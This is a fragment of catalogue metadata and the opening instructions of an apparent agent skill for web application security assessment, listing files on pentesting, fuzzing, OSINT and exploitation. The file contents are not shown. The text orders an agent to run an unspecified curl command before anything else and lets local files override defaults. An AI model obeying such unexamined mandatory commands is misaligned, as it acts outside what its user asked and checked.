charset=utf-8"},{"id":"841a8b95-3388-5fee-9e22-7b68193c11a5","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/841a8b95-3388-5fee-9e22-7b68193c11a5/attachment.md","path":"Workflows/bug-bounty/AutomationTool.md","size":7208,"sha256":"e6bbb5598e4b0266a5c545eae73be2ab32da377da7b24acefee83acf6691db40","contentType":"text/markdown; charset=utf-8"},{"id":"8fbc3848-2f44-562b-ad6a-2a0709998881","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/8fbc3848-2f44-562b-ad6a-2a0709998881/attachment.md","path":"Workflows/bug-bounty/Programs.md","size":6453,"sha256":"5d9c74b169f81ffd53fbf2ea8e54c66094c2002b7f4b329bac98b3a6ebd5c147","contentType":"text/markdown; charset=utf-8"},{"id":"cba80915-2bc3-550c-88c6-bb27a6fae0af","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/cba80915-2bc3-550c-88c6-bb27a6fae0af/attachment.md","path":"Workflows/ffuf/FfufGuide.md","size":17866,"sha256":"da9d28b84c17c105a74275aeeed5bc35898d5b5a229e9f949470ee4e34b9fc7d","contentType":"text/markdown; charset=utf-8"},{"id":"ec668840-bec1-591f-81c4-499564f1335f","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/ec668840-bec1-591f-81c4-499564f1335f/attachment.md","path":"Workflows/ffuf/FfufHelper.md","size":4629,"sha256":"8693354ae87008ecd2334aace8eba435bd74b1adb83a02b9315b06a27e6b72b6","contentType":"text/markdown; charset=utf-8"},{"id":"6d0c050c-e9fd-58da-9620-ca3bb025b685","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/6d0c050c-e9fd-58da-9620-ca3bb025b685/attachment.md","path":"Workflows/osint/Automation.md","size":32284,"sha256":"174146cca603dc9dd7da993c0461a02ae8e3b0e8fb26a03ecd7a76a721292b0f","contentType":"text/markdown; charset=utf-8"},{"id":"c91848e5-58c8-50d0-b12d-86b6c94ced1f","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/c91848e5-58c8-50d0-b12d-86b6c94ced1f/attachment.md","path":"Workflows/osint/MasterGuide.md","size":19542,"sha256":"37ef4e123892588d4bd6317b8f59eeec556d10d9b40a6401438832499d26702a","contentType":"text/markdown; charset=utf-8"},{"id":"da371253-74dd-5443-9adf-060fdcdc31bb","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/da371253-74dd-5443-9adf-060fdcdc31bb/attachment.md","path":"Workflows/osint/MetadataAnalysis.md","size":31322,"sha256":"914ae689f758445c973cbf62cdee2e9fb8f08a101dcdc969c1c466889431d67c","contentType":"text/markdown; charset=utf-8"},{"id":"b5a9db3e-2eb1-5708-a5d4-362b3cceda2b","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/b5a9db3e-2eb1-5708-a5d4-362b3cceda2b/attachment.md","path":"Workflows/osint/Reconnaissance.md","size":21827,"sha256":"0a76f23fd6e52e20ce60d4cd643c6a7fe3dbb2a03769646cf44e47bd5d01fece","contentType":"text/markdown; charset=utf-8"},{"id":"4f69e67c-9f3f-5c5a-a394-f6b03c177cb5","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/4f69e67c-9f3f-5c5a-a394-f6b03c177cb5/attachment.md","path":"Workflows/osint/SocialMediaIntel.md","size":26005,"sha256":"6f73ee56e1e1ef5302aecf15ce98fdfe41dfbc4275aca604491659861f427ec7","contentType":"text/markdown; charset=utf-8"},{"id":"b5c2ccbe-0df4-5e53-9f14-d35ac29728b5","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/b5c2ccbe-0df4-5e53-9f14-d35ac29728b5/attachment.md","path":"Workflows/pentest/Exploitation.md","size":6650,"sha256":"6921adbc3d0df91f3396b087f8c798fb6de1a08a59859f4ff593249b6ee1d5e3","contentType":"text/markdown; charset=utf-8"},{"id":"4e169eb7-cea0-58d3-b53a-b3ced398afac","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/4e169eb7-cea0-58d3-b53a-b3ced398afac/attachment.md","path":"Workflows/pentest/MasterMethodology.md","size":24632,"sha256":"28b225b2368ac2a65268d47be0448f51a117e451c28cf7cc408df923bbf49d41","contentType":"text/markdown; charset=utf-8"},{"id":"a0f830ac-1cba-5f9a-bafa-30795fec2043","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/a0f830ac-1cba-5f9a-bafa-30795fec2043/attachment.md","path":"Workflows/pentest/Reconnaissance.md","size":4408,"sha256":"4d4f940a63ea9e1b5d0818510983c7ffb1979cf420a6e80b6142df2cb39baf4e","contentType":"text/markdown; charset=utf-8"},{"id":"7ac5cda3-8d86-5cdf-a930-ad7a7d8f3792","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/7ac5cda3-8d86-5cdf-a930-ad7a7d8f3792/attachment.md","path":"Workflows/pentest/ToolInventory.md","size":22869,"sha256":"8e2d6a820f8f128be2c592f078ec14b54881ef4113d2f66f19b78baf0de163ff","contentType":"text/markdown; charset=utf-8"},{"id":"edde90a8-b729-589a-9654-e86cdea0acc3","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/edde90a8-b729-589a-9654-e86cdea0acc3/attachment.md","path":"Workflows/webapp/Examples.md","size":9931,"sha256":"dc501ec4c5b5e98997b38c167206ff7395184bb3e327a5d32c2a358d8b1543d0","contentType":"text/markdown; charset=utf-8"},{"id":"74d944c2-6236-51f2-8a96-752fca026edb","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/74d944c2-6236-51f2-8a96-752fca026edb/attachment.md","path":"Workflows/webapp/TestingGuide.md","size":4398,"sha256":"95255a65f36821218b6d6efff3ee48b09f2ebb0fd01a449f00ff7d3874a8f942","contentType":"text/markdown; charset=utf-8"},{"id":"16f80377-f330-5760-8145-46b3e9ae0642","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/16f80377-f330-5760-8145-46b3e9ae0642/attachment.py","path":"ffuf-helper.py","size":7336,"sha256":"146e73d162b71f6535da267a09584f2de10757291088c1405fa98ce81eda7a7d","contentType":"text/x-python; charset=utf-8"}],"bundle_sha256":"2bf2aa763b32dca024e8944c046b54748d885733fbb44643e3f509a2c471e13f","attachment_count":45,"text_attachments":45,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":5,"skill_md_path":"Releases/v4.0.0/.claude/skills/Security/WebAssessment/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"security","category_label":"Security"},"exact_dupes_collapsed_into_this":4},"version":"v1","category":"security","import_tag":"clean-skills-v1","description":"Full web app security assessment — app understanding, threat modeling, OWASP testing, ffuf fuzzing, Playwright automation, AI-assisted vuln analysis. Coordinates with Recon and PromptInjection skills. USE WHEN web assessment, pentest, security testing, vulnerability scan, threat model app, understand application, create threat model, vulnerability analysis, Gemini analysis, ffuf, fuzzing, bug bounty, OSINT, browser automation, Playwright."}},"renderedAt":1782987261814}

Customization Before executing, check for user customizations at: If this directory exists, load and apply any PREFERENCES.md, configurations, or resources found there. These override default behavior. If the directory does not exist, proceed with skill defaults. 🚨 MANDATORY: Voice Notification (REQUIRED BEFORE ANY ACTION) You MUST send this notification BEFORE doing anything else when this skill is invoked. 1. Send voice notification : 2. Output text notification : This is not optional. Execute this curl command immediately upon skill invocation. WebAssessment Skill Security assessment infr…